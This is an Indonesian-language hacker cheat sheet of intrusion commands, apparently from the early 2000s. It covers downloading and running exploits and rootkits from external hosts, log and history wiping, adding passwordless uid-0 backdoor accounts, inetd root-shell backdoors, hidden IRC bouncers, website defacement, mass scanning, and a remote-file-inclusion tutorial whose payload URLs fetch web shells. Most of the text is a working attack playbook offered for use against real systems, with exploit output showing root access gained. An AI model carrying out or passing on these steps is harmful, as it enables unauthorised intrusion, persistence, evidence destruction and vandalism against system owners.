: TRIK BIKIN PSYBNC : ================================================================================================= unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/ ; mkdir .... ; cd .... ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " " mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc ================================================================================================= : TRIK MENGHAPUS LOG : ================================================================================================= echo >/var/spool/mail/root echo >/var/run/utmp echo >/var/log/wtmp echo >/var/log/lastlog echo >/var/log/messages echo >/var/log/secure echo >/var/log/maillog echo >/var/log/xferlog rm -f /.bash_history /root/.bash_history /var/tmp/messages ln -s /dev/null /.bash_history ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages ================================================================================================= rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================================================================= : LOCAL ROOT MANDRAKE : ================================================================================================= unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd /tmp ; mkdir " " ; cd " " 1. wget www.geocities.com/lifron/local.tar.gz 2. tar -zxvf local.tar.gz 3. cd local 4. ./lconfex -p 5. ./lconfex -f 6. ./handy.sh 0xbffff625 0xbffff5f1 7. mkdir segfault.eng ; touch segfault.eng/segfault.eng 8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 9. id 10. root 11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua 12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success 13. Login ke shell terus bersihkan log dan pasang backdoor 14. last |grep kuntua 15. su tondano 16. wget http//www.geocities.com/lifron/remove.c 17. gcc -o r remove.c -DGENERIC 18. ./remove /home/kuntus 19. wget www.geocities.com/lifron/shv4.tar.gz 20. tar -zxvf shv4.tar.gz 21. cd shv4 22. ./setup pass port, misal ./setup kuntua75 7788 23. /usr/sbin/userdel -r kuntua 24. cd /var/tmp/" " <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : kuntua75 ================================================================================================= find index.html whereis index.html locate index.html default : cd /var/www/html echo "KuNTuA ToNDaNo Was Here" > index.html ================================================================================================= cd /home mkdir apache cd apache mkdir public_html chmod 705 public_html cd public_html mv index.html mnc.html echo "KuNTuA ToNDaNo Was Here" > mnc.html untuk mentesnya : http://IP-yg-kamu-hack/~apache ================================================================================================= BIKIN BACKDOOR ================================================================================================= echo "kuntua 1979/tcp" >> /etc/services echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf kill -HUP 135 telnet dengan port "1979" ================================================================================================= http://www.rocketpunch-ent.com/masslpd.tar http://www.rocketpunch-ent.com/bindscan.c http://www.rocketpunch-ent.com/lucstatdx.c ================================================================================================= [root@gila /]#rpm -qa | grep samba samba-client-2.0.7-36 samba-2.0.7-36 samba-common-2.0.7-36 [root@gila /]# arp -n Address HWtype HWaddress Flags Mask Iface 192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1 192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1 192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1 192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1 192.168.0.3 ether 00:10:5A:71:17:E3 C eth1 192.168.0.1 ether 00:00:21:28:8C:47 C eth1 [root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios Got a positive name query response from 192.168.0.2 ( 192.168.0.2 ) Got a positive name query response from 192.168.0.4 ( 192.168.0.4 ) Got a positive name query response from 192.168.0.5 ( 192.168.0.5 ) Got a positive name query response from 192.168.0.3 ( 192.168.0.3 ) Got a positive name query response from 192.168.0.1 ( 192.168.0.1 ) [root@gila /]# locate findsmb /usr/bin/findsmb [root@router /]# findsmb IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION ----------------------------------------- 192.168.0.1 CYBER1 [CYBER] 192.168.0.2 CYBER2 [CYBER] 192.168.0.3 CYBER3 [CYBER] 192.168.0.4 CYBER4 [CYBER] 192.168.0.5 CYBER5 [CYBER] [root@gila /]# mkdir /mnt/samba [root@gila /]# smbclient -L CYBER5 Got a positive name query response from 192.168.0.5 ( 192.168.0.5 ) Password: Sharename Type Comment --------- ---- ------- A Disk C Disk D Disk E Disk IPC$ IPC Remote Inter Process Communication [root@gila /]# smbmount //cyber5/d /mnt/samba/ Password: [root@gila /]# [root@gila /]# cd /mnt/samba/ [root@router samba]# ls ffastun.ffa ffastun.ffo install RECYCLED ffastun0.ffx ffastun.ffl film win98 [root@gila samba]# cd film/ [root@gila film]# ls Amy_Lindsay_Forbidden_Sins_01[1].mpeg ================================================================================================= bash# tar -zxvf grabbb-0.1.0.tar.gz bash# cd grabbb bash# gcc -o grabbb grabbb.c bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23 ================================================================================================= gcc sco-pop.c -o sco-pop ./sco-pop www.target.com /var/adm ================================================================================================= : BERSIHKAN LOG : ================================================================================================= ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx ================================================================================================= securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org ================================================================================================= repsec.com|iss.net|checkpoint.com|infowar.com| ================================================================================================= li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org ================================================================================================= harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu| ================================================================================================= http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz| ================================================================================================= 1. wget www.geocities.com/lifron/openssl.tar.gz 2. tar -zxvf openssl.tar.gz 3. ./ssl IP ./ssl 204.145.119.253 ================================================================================================= 1. wget www.geocities.com/lifron/massapache.tar.gz 2. tar -zxvf massapache.tar.gz 3. cd massapache 4. ./massossl 211 443 10 ================================================================================================= 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz 2. tar -zxvf openssl-too-open.tar.gz 3. cd openssl-too-open 4. ./openssl-too-open ./openssl-too-open -a 0x15 -v 212.70.224.129 ================================================================================================= 1. wget www.geocities.com/lifron/shv4.tar.gz 2. tar xzf shv4.tar.gz 3. cd shv4 4. ./setup port passwd ./setup 7788 35b4tu ================================================================================================= 1. wget http://www.geocities.com/lifron/massplor.tar.gz 2. tar -zxvf massplor.tar.gz 3. cd massplo 4. ./massplo IP -d 8 ./massplo 210.10 -d 8 ================================================================================================= 1. wget www.geocities.com/lifron/mapache2x.gz 2. tar -zxvf mapache2x.gz 3. cd slamet 4. ./apache 208.134.131.49 ./massossl 80 443 13 ./mapache 443 210.10 ================================================================================================= 1. wget http://phaty.org/ptrace-kmod.c.txt 2. mv ptrace-kmod.c.txt ptrace-kmod.c 3. gcc -o ptrace-kmod ptrace-kmod.c 4. ./ptrace-kmod ================================================================================================= 1. wget http://netric.org/exploit/sambal.c 2. gcc -o sambal sambal.c 3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================================================================= SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================================================================= DEFACE ================================================================================================= find index.html whereis index.html locate index.html default : cd /var/www/html echo "KuNTuA Was Here" > index.html ================================================================================================= cd /home mkdir apache cd apache mkdir public_html chmod 705 public_html cd public_html mv index.html mnc.html echo "KuNTuA Was Here" > mnc.html untuk mentesnya : http://IP-yg-kamu-hack/~apache ================================================================================================= Install WGET ================================================================================================= 1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya 2. ketik: ftp ftp.rpmfind.net 3. login : anonymous 4. cd linux/redhat/updates/7.0/en/os/ 5. cd i386 6. get wget-1.8.2-4.70.i386.rpm 7. quit dari ftp 8. Proses Peng-Instalan rpm -ivh wget-1.8.2-4.70.i386.rpm http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch= ================================================================================================= wget http://202.158.16.157/ssh.diff wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz tar -zxvf openssh-3.5p1.tar.gz cp ssh.diff openssh-3.5p1.tar.gz cd openssh-3.5p1 patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================================================================= : COMMAND ADDUSER : ================================================================================================= /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================================================================= passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================================================================= ================================================================================================= OPENSSL-TOO-OPEN ================================================================================================= ./openssl -a 0x15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host -> ssl_connect_host : Using the OpenSSL info leak to retrieve the addresses -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl0 : 0x80e1638 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl1 : 0x80e1638 -> send_client_hello -> get_server_hello -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_finished ssl2 : 0x80e1638 : Sending shellcode -> send_client_hello -> get_server_hello ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208 -> send_client_master_key -> generate_session_keys -> get_server_verify -> send_client_finished -> get_server_error Execution of stage1 shellcode succeeded, sending stage2 Spawning shell... bash: no job control in this shell bash-2.05$ bash-2.05$ uname -a;id bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586 bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache) ================================================================================================= : MARI KITA MAINKAN ROOTNYA : ================================================================================================= unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 cd /tmp ; mkdir ... ; cd .... wget www.geocities.com/lifron/local.tar.gz tar -zxvf local.tar.gz cd local ./lconfex -p ./lconfex -f ./handy.sh 0xbffff625 0xbffff5f1 GOT IT! Your magic number is : 792 Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it. Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell *hint* : try play with -b if not succeed. [ n = 0..4 ] ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1 Good Luck d0inks! mkdir segfault.eng; touch segfault.eng/segfault.eng ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 id uid=0(root) gid=48(apache) groups=48(apache) ================================================================================================= /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd passwd -d mails Changing password for user mails Removing password for user mails passwd: Success login ke shell last |grep mails su apache mkdir /var/tmp/" " cd /var/tmp/" " wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c gcc -o r remove.c -DGENERIC ./remove /home/mails wget www.radikal.org/backdoor.tar.gz tar xzf backdoor.tar.gz ./setup 35b4tud1n91n 7788 /usr/sbin/userdel -r mails /usr/sbin/userdel -r apache cd /var/tmp/" " <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================================================================= [Langkah Hapus Log I] ================================================================================================= export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================================================================= [Langkah Hapus Log I] ================================================================================================= rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================================================================= wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================================================================= wget http://brutalside.host.sk/tools/ftp.tgz gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================================================================= scan port dgn pscan.c ==> www.packetstormsecurity.nl bila port:23 vurnerable bisa running exploit wget http://phaty.org/7350854_c.txt mv 7350854_c.txt 7350854.c gcc -o 7350854 7350854.c ./7350854 IP ./7350854 216.89.24.213 ================================================================================================= http://brutalside.host.sk/tools/kik chmod +x kik ./kik "-bash" ./psybnc ================================================================================================= ================================================================================================= find / -name wtmp -print find / -name utmp -print find / -name lastlog -print whereis wtmp whereis utmp whereis lastlog =================== /usr/sbin/useradd -d /home/apache -s /bin/ksh apache passwd apache Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan wget www.norifumiya.org/r.c gcc -o sh r.c rm -rf r.v rm -rf r.c chown 0:0 /tmp/sh chmod 777 sh Sampai disini kita selesai dengan permainan di server target root Sekarang kita kembali ke user dan ketik : ./sh nah, apa yg terjadi setelah kita jalankan command ./sh...? yg terjadi adalah uid dan gid kita adalah 0 :) ================================================================================================= wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz cd psybnc echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf ./psybnc psybnc.conf ================================================================================================= wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log mv psybnc "syslogd " echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf mv psybnc.conf " " ; pwd PATH=$PATH:/var/tmp/" "/.log/ "syslogd " " " mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ================================================================================================= +Command Mapache2x - ./mapache RangeIP (mis: ./mapachhe 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apachee 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./masssossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Miis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog udah di ketik semua ? udahh... tekan ctrl d . ================================= +Backdoor NEWCOMER FREZZ BackDooR - wget manadocarding.info/charles; chmod 755 charles; ./charles = wget http://www.geocities.com/lifron/root; chmod 755 root; ./root - wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000 = wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000 ***** ADD USER SHELL ***** /usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon passwd -d yrfon ----------------- Patch Your Root ----------------- wget http://www.geocities.com/lifron/patch.tar.gz tar -zxvf patch.tar.gz cd patch ./sexy BERSIH JEJAK:manual echo >/var/spool/mail/root echo >/var/run/utmp echo >/var/log/wtmp echo >/var/log/lastlog echo >/var/log/messages echo >/var/log/secure echo >/var/log/maillog echo >/var/log/xferlog ================================== LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz 2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz cd local chmod 755 * ./local.sh ./lconfex -p ./lconfex -f sh ./handy.sh 0xbffffb24 0xbffff661 ------------------- Add user dlm Root: ------------------- 1. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua passwd -d kuntua /usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes passwd -d moes /usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes passwd -d cakmoes 2. /usr/sbin/adduser jabriks -g root -d /var/jabriks passwd -d jabriks /usr/sbin/adduser mus -g root -d /var/mus passwd -d mus /usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano passwd tondano75 ---------------------------- **add user accses root ---------------------------- /usr/sbin/useradd bash -g root -u 0 -d / passwd -d tondano /usr/sbin/useradd jabrik -g root -u 0 -d / passwd -d jabrik /usr/sbin/useradd cakmoes -g root -u 0 -d / passwd -d cakmoes ----------- Del User ----------- /usr/sbin/userdel -r [namauser] PENTING kalo so dapa ROOT ketik id uname -a abis itu ketik cd /tmp ----------------- --------------------------------------------- ngeROOT ssh LINUX port 22: wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz tar -zxvf grabbb-0.1.0.tar.gz.tar.gz gcc -o grabbb grabbb.c cd grabbb ./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22 66.201.243.210 --------------------------------------------- wget www.suckmyass.org/ssh-scan8.tar.gz tar cd ssh-scan8 ./r00t 203.20 -d 4 <--- scan massal SSH ./r00t 203.20 -d 2 <--- scan massal FTP ./r00t 203.20 -d 3 <--- scan massal FTP ./r00t 134.7. -d 4 --------------------------------------------- ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP --------------------------------------------- pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 --------------------------------------------- LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Liinux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps ((defaulllt = 300) -c connectback ip adddress -C max childs for scaan/bruttteforce mode (default = 40) -d bruteforce/scanmodde delaaay in micro seconds (default = 100000) -f force -p port to attack (deefault = 139) -r return address -s scan mode (random)) -S scan mode -t presets (0 for a llist) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows ... + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attackk. -a password Default password iis "chaaangeme". -p port Default port is 80001. ================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo "" > httpd.conf = echo "ServerName www.Cmaster4.net" > httpd.conf = echo "DocumentRoot /home/iptek/public_html" > httpd.conf = echo "ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin" > httpd.conf = echo "" >> httpd.conf = ------------------------------ = ------------------------------ = ------------------------------ = find |grep name.conf = echo "zone "i-am.Cmaster4.net" IN {" > named.conf = echo "type master; > named.conf = echo "file "/var/named/named.local";" > named.conf = echo "allow-update { none; };" > named.conf = echo "};" >> named.conf = nah setelah itu kamu restart named dan httpd nya = /etc/init.d/named stop = /etc/init.d/named start = /etc/init.d/httpd stop = /etc/init.d/httpd start = atau = /etc/rc.d/init.d/named stop = /etc/rc.d/init.d/named start = /etc/rc.d/init.d/httpd stop = /etc/rc.d/init.d/httpd start = atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd ================================================================= wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik "/usr/sbin/httpd -DHAVE_PROXY -DHAVE" ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz ==================== EGGDROP ==================== = wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd .. = ./eggdrop -mnt bot.conf ./eggdrop -m bot.conf ============== My_eGallery from K-159 ============== 1.pasangin bindtty 2. kalo ggk jalan bindtty nya pasangin shell.php 3.kalo ggk jalan juga coba cgi-telnet contohnya http://livron.port5.com/mail.php <---------ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa... buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya biasanya folder cgi-bin ada di folder .../www tp kebanyakan webserver tiap user di beri folder cgi-bin masing2 contoh: /home/users/russisk/html/modules/My_eGallery/public <------td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <-------agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: "PHP SUPER BUGS" Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com --------------------------------------------------------------------------------------------------------- Prolog : i wrote this tutorial just for my dearest brother "Lieur-Euy" thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. 'n we will rock the world again :) 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?filename=*". keyword '*.php' bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?filename=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts " kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. allinurl content bugs content ini targetnya dapat kita cari dengan keyword "allinurl:*.php?content=". keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?content=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: " http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts " kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword "allinurl:*.php?page=*". '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?page=". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword "allinurl:*.php?link=*". keyword '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?link=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword "allinurl:*.php?file=*". '*.php' bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah "allinurl:index.php?file=*". Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. Setelah mendapatkan target yang vulnerable ada beberapa hal yang bisa kita lakukan : I. install bindtty telnet 1.buat url seperti ini: " http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=wget http://nofry.port5.com/bind1 -O /tmp/httpd " url 